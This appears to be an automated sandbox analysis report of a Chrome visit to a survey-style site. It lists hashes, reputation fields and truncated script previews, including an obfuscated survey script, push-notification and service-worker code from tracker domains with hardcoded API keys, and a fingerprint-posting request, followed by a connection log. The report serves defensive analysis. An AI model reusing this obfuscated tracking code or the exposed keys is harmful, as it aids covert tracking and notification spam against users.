                              Preview:function pushCount(pshparams,pshpub,pshfingerprint){....var xhr = new XMLHttpRequest();..xhr.open('POST', '');..xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');..xhr.onload = function() {...if (xhr.status === 200) {....var res = JSON.parse(xhr.responseText);....if (res.data === true) {.....console.log('push fired');....}else{.....console.log('params not found');....}...}..};..var pshparams = pshparams;..var pshpub = pshpub;..var data = '_type=ajax&_action=master-pushCount&s1=' + pshparams + '&s2=' + pshpub + '&fp=' + pshfingerprint;..xhr.send(data);.}....var MYCALL = MYCALL || (function(){. var pshparams = {}; // private. return {. init : function(Args) {. . //console.log(Args[2]);. pshparams = Args[0];. pshpub = Args[1];. pshdomain = Args[2];. pshfingerprint = Args[3];. // some other initialising. },. send : function() {. var script = document.createElement("scrip
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 400 x 373, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):100908
                              Entropy (8bit):7.9912967079258985
                              Encrypted:true
                              SSDEEP:3072:1cfS2A9GMqWF4Df6uT9JZl7aFWvQWO7JsXUePmp:1caLfFQRZl7aFUOK9ep
                              MD5:B532C629482B1E0DA3C6745865E819AE
                              SHA1:847B0088D6D3C327CC569EB3D31E8EDFCA393E77
                              SHA-256:DE68FD82DCF271E7CC020002EDDC83B6372B54E2D2806F7159994072409789B1
                              SHA-512:CB70DEB747565F17146943CE410794987CFACCA202A0FE04F6B4ADA2DD5D4DF0AA03436516BB07BC5816F8E291AC1B3486F14D68706B4B59AFB372146C379699
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR.......u......6......pHYs..........+.... .IDATx..i.%.Y&....}.y.,w.[...VK4-...#....4.X.........x.?.6....1...8.c..`.abp.`c.[.0.1.D.......j...J....z.\..?2..yN.Su..[...7....yry..y....:..:..:..:..:..:{..u...7.|4.%..HOY..+...Yg..t..i...^...zm^|.k.\.N.Q....Bk..%..CB.:.B.AO.);..~/L.o..J..u6....oz...lg.u.....r38-.....WO.....i....9.k.....H.....c..4b\..(..a.0..@..x.$~.8.l?R......m.'....@:{..q...?x.4...........`G...T. ....H.......X....,..V..%c.).~.V..3m..z.N_...CA..b.(..k.Y...C_...#.N..:.......e.?w.?..8...........).$.@.&....(........^.@..1.B.....A."....`g.. g..`.*..M...'...);.G.,.o....[.....z[.:P..@:{......c...'vt}Q`Q...BvP. $AH.......q.Zk.y.......gJ(v.B.Y@H...H)!........ X......r...!.49..$s%.dc%.+. .m/....r.;.F.=....tG...:....l.._<....G.w^...d......E.[C.8..&dE.B.(...e.%....."M..L.Z............,......J2.`(% D}c.3.. ...@... "0.-P\S.."......%.Q...B...+...........:....7.r.0....G.~.F.........(..;...$.s....h8..... .%.D.h...,30F..5..
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):2692
                              Entropy (8bit):7.889944535623974
                              Encrypted:false
                              SSDEEP:48:HhDkxCXEGYvEzlvcuMJ4gIb03PUGSf3+feLVetPMtoH7DJ8u6mgbY:HhDkcDYv60FJnI4E3+S5oH7DJ8u6LbY
                              MD5:091B619442EA29606ED35C4C5E8E607F
                              SHA1:280E7541AD56AAFA899A004B41FD69731565CE89
                              SHA-256:0E34D082CCDC00408C7C4DDDA543F1247F981EBC756C8458E2B6321D8A4D42A9
                              SHA-512:F91469502859A525F2654BA9A0F2973602912568C951C4B8E3139FE6440634B3CA3D18DDC54A4452AF133E05F4E5CC738C719A3E89F1C0F53FECD12C8C78AF7F
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR...2...2......?......pHYs..........+.....6IDATh..Z{p....}{.>....yH...... ....E+#.Z.mA[Qk..?..Q[g.S.Nig.3.FE.X.A,34.B.....0..............{...:.f..9....u.=........!4..Wy/G..d..<.@..R..u...Q.~.......1"j`.V..s.6.L.x......#../..r..._.`#.iA:1-..#..n..m.....so.@.G...../E.......!....^kN.Y..oTJ.f.?U......#.}.v.s.K....;''.>.....H8..2 ..q.l...g..=..b.<....S ...f..T........$I...H..f^AD.Z....q.':...w...k+..d.#.?.3..^?..=~e~..J....$.-.NFGV.?...H.."z..R......!.`.O.0....(....X.........,;6.G....6Q~..)......t....w.........>....e(p..Gt1....@.;.z...p:.....a..mi".q\.Z....e...Vu..R.R.Z..w..`.=....h.B.7..&.`L...........h.et..P=e..".p.`|...O..'....n$V...n....8m....-..td.3.\_t...F...BQ..Z.t.:...w>.7O..M.c....u|...>.....d[R.%.Z.66..{xc$*.(.. .7?.H.$........._7...F.37.I`....k.'[^.|.......p...........a.r..D.$.p...<q.8..$.:Q.&.D..I.!.......v.........8U...."..V..w...@DE.....H.(^....|..V,(..w.CQ...EN...`......q.Yy.......^..E.>.j.[....$..:....k.iy.L7.>9.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):8147
                              Entropy (8bit):5.321008352556851
                              Encrypted:false
                              SSDEEP:192:+SQGJEwbn64pyrYmWBwvuHZYep/3aF8frynW3X4wrc8:T/NbLBw2aQ/0nnW33o8
                              MD5:C6CFEE7C77F3BE97471B0085C419DB20
                              SHA1:4721A5B719C68098856A28CA1307F68581588853
                              SHA-256:5A2E118A815E6DE6042A2E004718938E3068FFDF3FCA85010A37FCAAA72D49AE
                              SHA-512:6CDCE62C837ECCFF63A5E4D715ED56574C00DBE66E683735CAB50C7256433EB5B05437191E652F81F21E257669920C3C3DBC6F739FAF796EA0F9154839F13717
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/js/intl_functions.js?v=454576b4f6c63244067eabf05b8f71b6
                              Preview:let o_survey = null;.let s_step = 0;.let lastQuestion = "";.function startINTSurvey(st){..if (typeof template_name != 'undefined' && template_name === 'blanks') {...$('#confirm_popmessage').removeAttr('onclick');...$('.dis-ed-1').hide();...$('#pop-message-con').addClass('animated fadeOut');...$('#del-pack-con, #head-con, #load-track-con-ed-1').addClass('animated fadeIn').css({'display':'block','opacity':'0'});...$('#foot-con').hide();...$('.progress-bar').css({"width": "10%"});...$('.val-progr strong').html('10%');.../*end blanks*/...setTimeout(function () {....$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-child(1) i').removeClass('fa-spinner fa-spin').addClass('fa-check-circle');....$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-child(1)').addClass('checked');...}, 2000),...setTimeout(function () {....$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-child(2) i').removeClass('fa-spinner fa-spin').addClass('fa-check-circle');....$('#load-track-con-ed-1 .loading-list.ed-1 li:nth-
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 500 x 83, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):8332
                              Entropy (8bit):7.8527433696689535
                              Encrypted:false
                              SSDEEP:192:cBqaAuJ0azrXMmBfGhISW6knZ/lvMKND3v6i0dAFUx19R8Cs:NaBJ0GrcmBfGhPWJnzvMKNx
                              MD5:F1CE9018B0B0E131BD2ED0E5B68CFE41
                              SHA1:B69DB2E912C438FB0595A245A1C043567A9720F1
                              SHA-256:6397F628A28671D7CFF67CC61337AE3592E014D873A3BB1E916DBED7AE23E48E
                              SHA-512:A4439B7B46C2619F78C0392E7837DA72B2EDDAF9E8C0A307D6ECFED21852F81F9AA0A02F50C9E91FC3AFE80ECBA0C119452BA839F2F4A6E4FAB91C0A48CE9F13
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR.......S.....i..h...^iCCPDisplay..H.WwXS...[RIh..H..... %..A@. *!.$......]T`."..].Q.....".uQ.e......l.....s...}..;..9.;%3...@../....K....!...i,R................`...j..o....\qQq.....E...I.8S...C|...T ...@..r..2..Cl ..B<K...x..g...A..x.....i|.<...6(g...!..#.].B........b...D.G..OS.y.;@}.. fg~..o....|~.0V.5....,.?...[~.r...4.<2^.?....iQ*L..G.....5..$Bu..@.bed.Z.5.(.0..........)....h.<3K......XR.K.],R.%h87.....,9..Y.....U.)s.8...b.o..u.81.b*...H....6....(..fU"......*.m f...!j~,=K.....+......^..W...#...v.....A.(.r..xD...C..E.a..v.4I./vOV...Y.+....dQ^.Jn....(A...[.7.......%...3r......E .pA(<}J.3.4..$.=M=.z&....d..p.H.V...H.3.... .....Y.(..O.R...d........!..Q ..V....[K...D.....k....8P...(.xY:C..0b(1..Nt.M.@.....`..q6.;...}.cB.......pk..T../.A'...D..u.....C.....q&n.\pOh...A.^P............k.(...2..Lq.v.....0.*._.G.k.pV..3...~.g!......c......,v.k.,...]......z4.........y$.....TeR.Z....Q3..E....&.!.d..Y.....xR..Q,wWw7.T...k..s.[.0.}.....o9.f....8....
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8016)
                              Category:downloaded
                              Size (bytes):8017
                              Entropy (8bit):5.216075527591773
                              Encrypted:false
                              SSDEEP:192:HH6prnkowidT6idi6AeBVgDquumMbkCpIJ:HH6B5widT6ilASXkCpIJ
                              MD5:703C1F556759CE071B6B39F9998CDF8D
                              SHA1:0DBEBD991CBC9BC53151FE296A461E31F2D6E389
                              SHA-256:6DE3851925DDD0DCD2C115F28A49C3F33408457E94BE117ED29E3FA397B008E2
                              SHA-512:E7C8CB6B6E82CDFD39C18AAEB12D6CBBD1A9350DB340E87BCE45DCF801A8A501C9139AF8F54F495B76BEEA7C28BC4852B1A6915CF6010B1F92793A5F764AA753
                              Malicious:false
                              Reputation:low
                              URL:https://trk-amropode.com//scripts/pg/v9e118mez8
                              Preview:(function(a,b){function c(a){try{console.log=E}catch(a){}E(a)}function d(a){if(self.indexedDB){var b=G.apply(self.indexedDB,["pushPlatFormDb",2]);b.onerror=function(){console.log("error db"+b.error),a(null)},b.onsuccess=function(){var c=b.result,d=c.transaction(["store"],"readwrite"),e=d.objectStore("store");a(e)},b.onupgradeneeded=function(a){console.log("upgrading db from version "+a.oldVersion+" to 2");var c=b.result;if(2>a.oldVersion){var d=c.createObjectStore("store",{keyPath:"name"});k("",null,[],[],[],d)}}}else a(null)}function e(){try{Array=q,Array.prototype=q,Response=v,Response.prototype=x,Function.prototype.apply=H}catch(a){i("ext_ov_error",a,m)}}function f(a){return function(b){var f=!1;try{if(e(),"push"===b.type&&null!=b.data)try{let a=b.data.json();null!=a&&null!=a&&(f="WjoV"in a)}catch(a){c(a)}else if("notificationclick"===b.type||"notificationclose"===b.type)try{let a=b.notification.data;null!=a&&null!=a&&(f="WjoV"in b.notification.data)}catch(a){c(a)}}catch(a){c("init_
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):1836
                              Entropy (8bit):4.943416711762064
                              Encrypted:false
                              SSDEEP:48:bYIMDRXIAvpegEVai5U0Bip7bLDqpR7K+TOOLlQjUF:cPDR4AvphEVRU0BCmpRXv5Qo
                              MD5:902FFAF82918FE85CD11E44A6F153F9E
                              SHA1:05E19338A1E4795106E8C2188EEC970BA2A72ECB
                              SHA-256:F6A4ABFC08F9D1C5A888415F75AAD862E519A2283D43E2677F0090ED475870CD
                              SHA-512:1797ECB1712201027FA88B9B02F16F1460F659A05B4CE32708E36A24A9454679E336719A46DBB40F822EFA0543A0F419519B6A5D47EA06B9725AA772BFE2547A
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/js/functions.js?v=454576b4f6c63244067eabf05b8f71b6
                              Preview:function datehax() {. var mydate = new Date(). mydate.setDate(mydate.getDate());. var year = mydate.getYear(). if (year < 1000). year += 1900. var day = mydate.getDay(). var month = mydate.getMonth(). var daym = mydate.getDate(). if (daym < 10). daym = "0" + daym. var dayarray = new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"). var montharray = new Array("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"). return "" + montharray[month] + " " + daym + ", " + year + "";..}..function startTimer(duration) {. var timer = duration, minutes, seconds;. setInterval(function() {. minutes = parseInt(timer / 60, 10);. seconds = parseInt(timer % 60, 10);.. minutes = minutes < 10 ? "" + minutes : minutes;. seconds = seconds < 10 ? "0" + seconds : seconds;. if(typeof($('#time')) != "undefined"){. $('#time').html(minutes + ":" + seconds);. }. if (
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                              Category:downloaded
                              Size (bytes):15406
                              Entropy (8bit):1.4037136087364375
                              Encrypted:false
                              SSDEEP:96:ElxRlQUyXO9WBWibsAdBiED26mTXU5bOql2j:ElxRam8BWi5iED264XU5bOql2j
                              MD5:9E3E8B6D89D426AD950F5144D15921E6
                              SHA1:6CEFE5C7CA4A97D2118FB849F37F4FFA4F9F0EE0
                              SHA-256:703063F5CFEBF76BD6190DD87052D6664D3A0FCF474D837D89F6B7FAE7A8F3B5
                              SHA-512:A063BE8A7879B431338506AEA3975376F7ADDF2B9C01563F4AAEFDAA827C2568F76DA0B32BAE9665E09507C9CEBB44FABE6D194E5944E000FC299FA0A41F1C44
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/favicon.ico
                              Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ............................................................................................................................................................................ ...........Y............................................... ...................Y....................................... ...........................Y............................... ...................................Y...................................................................Z.......................................f...+.......................Y...............9...............g...........).......................Y...............<.......e...................).......................X...........................................*.......................L...........................................*...................t...............................................+...................................................................#...X..................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):108859
                              Entropy (8bit):5.307653072943214
                              Encrypted:false
                              SSDEEP:1536:RsSjr2uciGTF5VuEJ7x+5qmXY8ugpd1oCSsIcXWcV2ySTzIpLPeSImaf9I++:Rs+UTzIpLPeSImaI
                              MD5:924045A9895CDF90565159EBEAE3A4A2
                              SHA1:0166C85277FAC72CD507FF53ADF45BD71F650816
                              SHA-256:E4075ECE2D9B064C092F3DD28FF67615E3188B03D580BF8AD72B2DB1098D95E1
                              SHA-512:C2B374944AAC0D8CD8BC796C531B0F9706FCCC4C18465E776488C0EA4E511F378E2E8F7230C546A2D0ED5F7A83A5B6CFCA355B0B141FC64BC359F2FA4DC6E55B
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/js/dublin/dist/common-hybrid.js?v=454576b4f6c63244067eabf05b8f71b6
                              Preview:var a0_0x39b7ce=a0_0x21be;(function(_0x2c55b2,_0x54a771){var _0x58eb15=a0_0x21be,_0x5c95d7=_0x2c55b2();while(!![]){try{var _0xd0b6de=-parseInt(_0x58eb15(0x2ef))/0x1*(-parseInt(_0x58eb15(0x30e))/0x2)+-parseInt(_0x58eb15(0x1c1))/0x3*(parseInt(_0x58eb15(0x289))/0x4)+-parseInt(_0x58eb15(0x21d))/0x5*(-parseInt(_0x58eb15(0x234))/0x6)+parseInt(_0x58eb15(0xf4))/0x7*(parseInt(_0x58eb15(0x19f))/0x8)+-parseInt(_0x58eb15(0x183))/0x9+-parseInt(_0x58eb15(0x2db))/0xa+parseInt(_0x58eb15(0x1bc))/0xb;if(_0xd0b6de===_0x54a771)break;else _0x5c95d7['push'](_0x5c95d7['shift']());}catch(_0x151fff){_0x5c95d7['push'](_0x5c95d7['shift']());}}}(a0_0x4317,0xe2fe5));let $curr,data={},surveyid='';var attrChoices=$(a0_0x39b7ce(0x1bf))['attr']('sid'),domain='excite.osramlumens.com',count=0x0,pipeline='sau.bbcrystal.com',zipcode='',state_selected='',processing=![];let is_v4_0_b=!!document[a0_0x39b7ce(0x106)](a0_0x39b7ce(0x246)),icon_buttons=is_v4_0_b?'<i\x20class=\x22fa\x20fa-check-circle\x22\x20aria-hidden=\x22true\x
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7321)
                              Category:downloaded
                              Size (bytes):7322
                              Entropy (8bit):5.227500119410646
                              Encrypted:false
                              SSDEEP:192:T9ZRIOUcWQOZBdK+eydsdof+4Wd/si4E+wC/Hhdk/yMJV4pHnX:T9ZWOUpQSduydsdorWdkit8BdLMY9X
                              MD5:D7389F6C79E28FAF16D96B0D2346E056
                              SHA1:1523089C9B42EB35F91354DC02D3F7A9488EF583
                              SHA-256:23B333974694CD7A3512EBC085F87C3C7FD29D7F80361657036275D26D292C76
                              SHA-512:0D3FD1F321037E9551E079C2D5C604FCD60910B6823EB42570D0FDBF2552E7607F7F09103C77DDCC9136C1ADFEDE077E12995861D498A46FE5652928FB693394
                              Malicious:false
                              Reputation:low
                              URL:https://trk-adulvion.com/scripts/push/v9e118mez8
                              Preview:'use strict';const smPushApplicationServerPublicKey="BJbujtKImkiLWjlWkMGYMo2_sM0al24KoS7U6TJ1U7sKJaxlIULz5s6p7tN6WbnLisCq_Si5hP7X0769TvPDFTQ=",smPushSiteId="v9e118mez8",smClientId="q2goykjdrv",serviceWorker="/service-worker.js";let smPushDomain="push.trk-adulvion.com",pushLogging=!0;const version=817;let smPushSubscriptionId,subscriptionDomain="subscription.trk-adulvion.com",eventDomain="event.trk-adulvion.com",sessionId="";const utmObj={mt:"",utm_source:"",utm_medium:"",utm_campaign:"",source_one:"",source_two:"",source_three:"",source_four:"",source_five:""},taboolaUrl="https://api.taboola.com/2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412";function urlBase64ToUint8Array(a){const b="=".repeat((4-a.length%4)%4),c=(a+b).replace(/\-/g,"+").replace(/_/g,"/"),d=window.atob(c),e=new Uint8Array(d.length);for(let b=0;b<d.length;++b)e[b]=d.charCodeAt(b);return e}function pullUrlParams(a){let b=getUrlVars();a.timezone=new Intl.DateTimeFormat(
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2212)
                              Category:downloaded
                              Size (bytes):196489
                              Entropy (8bit):5.532445976946235
                              Encrypted:false
                              SSDEEP:3072:ydQaf5qZ3fhO+MWY85G1LceF2/eaJQ9STnXDL9btIMsb32w:sQX5NjYLceF+1TnXP9RIMc33
                              MD5:644AB05952B9EA3B9D1E91791EAB369E
                              SHA1:72FAC07A4E2D95683CD3D81DFE06264A7482B63F
                              SHA-256:936F1866D8844721E4576DD0FC58E58EA481F0B0A69A32D9E583201B6A5075FA
                              SHA-512:D2BCE91BEF376EF65B4FA6D3D3EF5355F1057D5FCC15B435F30C95A1E4567BAED1921166DD7602074904A7B15C2F35BFA3DED0D858A784C9716D8FAD20043DAC
                              Malicious:false
                              Reputation:low
                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-NK3N874
                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"7",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__jsm","vtp_javascript":["template","(function(){return google_tag_manager[\"GTM-NK3N874\"].dataLayer.get(\"gtm.element\").parentElement.parentElement.querySelector(\"p.question\").innerText})();"]},{"function":"__jsm","vtp_javascript":["template","(function(){return google_tag_manager[\"GTM-NK3N874\"].dataLayer.get(\"gtm.element\").parentElement.querySelector(\"span.product_won\").innerText})();"]},{"function":"__u","vtp_component":"QUERY","vtp_queryKey":"s2","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_ena
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65451)
                              Category:downloaded
                              Size (bytes):88144
                              Entropy (8bit):5.290986223370378
                              Encrypted:false
                              SSDEEP:1536:yTExXUZinxD7oPEZxkMV4SYKFMbRHZ6H5HOHCWrcElzuu7BRCKKBEqBsojZlOPmw:ygZm0H5HO5+gCKWZyPmHQ47GKc
                              MD5:F832E36068AB203A3F89B1795480D0D7
                              SHA1:2115753CA5FB7032AEC498DB7BB5DCA624DBE6BE
                              SHA-256:4C24DFD28784AD2BEFB3DAFAAC6BF1ED4E7CD58CCE713D9A0B228D426E812BAF
                              SHA-512:B9DBC08C984AE3C7FD44822EC2E9A22CB8CF7DA55FA3975DBBDC3F18FD7E7A7793E8D93604826574E3DD6A4F982D7AF4F96C1AF5E10D847B8394A34A82C398BA
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/vendors/jquery-3.4.1.min.js
                              Preview:/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11692)
                              Category:downloaded
                              Size (bytes):11693
                              Entropy (8bit):5.285127085064925
                              Encrypted:false
                              SSDEEP:192:TWGLvprnectg07AKE2H+6W/ed2orSibOinqbNE0vaUSJ5culHT+:TWkvBeUXAKE2e/ed2orJOinqbNELUSQx
                              MD5:1C0B7E8036B9B3C37FD6F52A71D30192
                              SHA1:6188D0796F99BB2D87CEBCC6B219890EC6B42763
                              SHA-256:560FA7174BA624B91BCBC9865C38D59544FA09BFD2CAC1DE279224222AFCF283
                              SHA-512:C7B8BCE2FB7E6D6C1204328D2A5CD1CC67016C9572E19D0A485B00C3324F6FC1A1D78AF0C8A6139CB209DA7647CD6F2C6BC43363FB417BA56A36D7BF4F6B429E
                              Malicious:false
                              Reputation:low
                              URL:https://trk-amropode.com//scripts/sw/v9e118mez8
                              Preview:'use strict';const env={log:!0,retry:10,sleepTime:1e4,domain:"push.trk-amropode.com",notificationDomain:"notification.trk-amropode.com",subscriptionDomain:"subscription.trk-amropode.com",eventDomain:"event.trk-amropode.com"},applicationServerPublicKey="BJbujtKImkiLWjlWkMGYMo2_sM0al24KoS7U6TJ1U7sKJaxlIULz5s6p7tN6WbnLisCq_Si5hP7X0769TvPDFTQ=",siteId="v9e118mez8",smClientId="q2goykjdrv",version=533,smAPIKey="29788ca9761a4b78abcfb1c3eabb8e68";let smPushSubscriptionId;function getStore(a){if(self.indexedDB){var b=self.indexedDB.open("pushPlatFormDb",2);b.onerror=function(){console.log("error db"+b.error),a(null)},b.onsuccess=function(){var c=b.result,d=c.transaction(["store"],"readwrite"),e=d.objectStore("store");a(e)},b.onupgradeneeded=function(a){console.log("upgrading db from version "+a.oldVersion+" to 2");var c=b.result;if(2>a.oldVersion){var d=c.createObjectStore("store",{keyPath:"name"});setUserDataInStore("",null,[],[],[],d)}}}else a(null)}function arrayRotate(a,b){return b?a.unshif
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                              Category:downloaded
                              Size (bytes):1990
                              Entropy (8bit):7.219494860012059
                              Encrypted:false
                              SSDEEP:48:Il1Nn2WQ0J3wYaJPrXLyzMWp1UpT4sxCgmyPhaEr/6f2gon:C2Q2rKfeT5CgmWV8Hon
                              MD5:0CEF7DE4AD132A1171112B50837071C1
                              SHA1:AFF4ED042AA90335E87075F7477D856F4097DF9E
                              SHA-256:6B3771113EA2C584837A3B4036F7F8F810C11E8B02F78E98EED712C82618077A
                              SHA-512:E4E9D37FE504218419694F88690155F400C0EC3C21F931A172A9AA1D7E2B547C1DDEDFA05363D12205866A7D46DEED204C44C143F20A08B1975D50918C33B186
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/images/ci1.jpg
                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:4A1767A38B8011ED817ADEB99A27D979" xmpMM:DocumentID="xmp.did:4A1767A48B8011ED817ADEB99A27D979"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4A1767A18B8011ED817ADEB99A27D979" stRef:documentID="xmp.did:4A1767A28B8011ED817ADEB99A27D979"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (62961)
                              Category:downloaded
                              Size (bytes):63240
                              Entropy (8bit):5.122547437385465
                              Encrypted:false
                              SSDEEP:768:dKD1OQYUhHVvO1Nnng76Tq8mrIIeoBAiAHFcQqK8jXLb6mH/3fn57hC+:dG1r7CDVBUXv/VhC+
                              MD5:F20FA8B102F205141295CDEFD6FFE449
                              SHA1:0C4E8445F6F0C9611DC1C13DC6F085EB4BCACA0B
                              SHA-256:D8968086F7509DF34C3278563DAB87399DA4F9DCDFB419818E3A309EEDC70B88
                              SHA-512:F2A9A2B37D4E422EA121182F921B74B3A9823A2B6D8CC6BD18CAAD2BD85EB39884401404FC26BAC8613916C5B7EAFCA2A46A1642CC018FF4019B6251D3CE9193
                              Malicious:false
                              Reputation:low
                              URL:https://tensewire.net/assets/vendors/bootstrap-4.5.3/js/bootstrap.min.js
                              Preview:/*!. * Bootstrap v4.5.3 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t){return t&&"object"==typeof t&&"default"in t?t:{default:t}}var o=i(e),a=i(n);function s(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function l(t,e,n){return e&&s(t.prototype,e),n&&s(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.p
                              No static file info
                              TimestampSource PortDest PortSource IPDest IP
                              Apr 25, 2024 20:21:57.296294928 CEST49675443192.168.2.4173.222.162.32
                              Apr 25, 2024 20:22:06.998234034 CEST49675443192.168.2.4173.222.162.32
                              Apr 25, 2024 20:22:07.869982958 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:07.870007992 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:07.870085001 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:07.872273922 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:07.872297049 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:07.872365952 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:07.872989893 CEST49736443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:07.873003960 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:07.882368088 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:07.882381916 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.114804983 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.115181923 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.115194082 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.116197109 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.116280079 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.117469072 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.117530107 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.117652893 CEST49735443192.168.2.4172.67.128.112
                              Apr 25, 2024 20:22:08.117659092 CEST44349735172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.117697954 CEST44349736172.67.128.112192.168.2.4
                              Apr 25, 2024 20:22:08.117866039 CEST49736443192.168.2.4172.67.128.112
